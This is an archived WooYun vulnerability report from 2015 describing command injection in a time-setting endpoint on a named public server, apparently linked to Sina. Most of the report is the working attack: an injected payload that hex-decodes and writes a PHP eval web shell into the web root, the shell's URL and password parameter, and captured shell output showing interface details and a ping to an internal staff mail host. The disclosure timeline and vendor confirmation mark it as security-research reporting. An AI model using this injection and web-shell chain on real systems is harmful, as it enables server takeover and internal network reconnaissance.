乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-11-07: 细节已通知厂商并且等待厂商处理中 2015-11-07: 厂商已经确认,细节仅向厂商公开 2015-11-17: 细节向核心白帽子及相关领域专家公开 2015-11-27: 细节向普通白帽子公开 2015-12-07: 细节向实习白帽子公开 2015-12-22: 细节向公众公开
code exec
http://61.135.152.231/webtrans/index.php?controller=user&action=login
http://61.135.152.231/SetTime/index.php?time=%27set%7cset%26set%27
set处存在代码执行
pwd写入shell
61.135.152.231//SetTime/index.php?time='set;echo+3C3F706870206576616C28245F504F53545B635D293B3F3E|xxd+-r+-ps+>/var/www/webbak/template/1.php;ls+'
http://61.135.152.231/webbak/template/1.php c
[/var/www/webbak/template/]$ /sbin/ifconfigeth0 Link encap:Ethernet HWaddr 0c:c4:7a:08:7c:7c inet addr:61.135.152.231 Bcast:61.135.152.255 Mask:255.255.255.224 inet6 addr: fe80::ec4:7aff:fe08:7c7c/64 Scope:Link UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1 RX packets:5017795 errors:0 dropped:0 overruns:0 frame:0 TX packets:2704480 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 RX bytes:1182610202 (1.1 GB) TX bytes:326898975 (326.8 MB) Memory:f7200000-f7280000 eth1 Link encap:Ethernet HWaddr 0c:c4:7a:08:7c:7d inet addr:192.168.1.145 Bcast:192.168.1.255 Mask:255.255.255.0 UP BROADCAST MULTICAST MTU:1500 Metric:1 RX packets:0 errors:0 dropped:0 overruns:0 frame:0 TX packets:0 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 RX bytes:0 (0.0 B) TX bytes:0 (0.0 B) Memory:f7100000-f7180000 lo Link encap:Local Loopback inet addr:127.0.0.1 Mask:255.0.0.0 inet6 addr: ::1/128 Scope:Host UP LOOPBACK RUNNING MTU:16436 Metric:1 RX packets:680777 errors:0 dropped:0 overruns:0 frame:0 TX packets:680777 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 RX bytes:756699997 (756.6 MB) TX bytes:756699997 (756.6 MB)[/var/www/webbak/template/]$ ping -c 1 mail.staff.sina.com.cnPING mail.staff.sina.com.cn (10.210.97.18) 56(84) bytes of data.64 bytes from bogon (10.210.97.18): icmp_req=1 ttl=252 time=0.113 ms--- mail.staff.sina.com.cn ping statistics ---1 packets transmitted, 1 received, 0% packet loss, time 0msrtt min/avg/max/mdev = 0.113/0.113/0.113/0.000 ms[/var/www/webbak/template/]$
危害等级:高
漏洞Rank:10
确认时间:2015-11-07 17:03
感谢支持,已经通知业务整改
暂无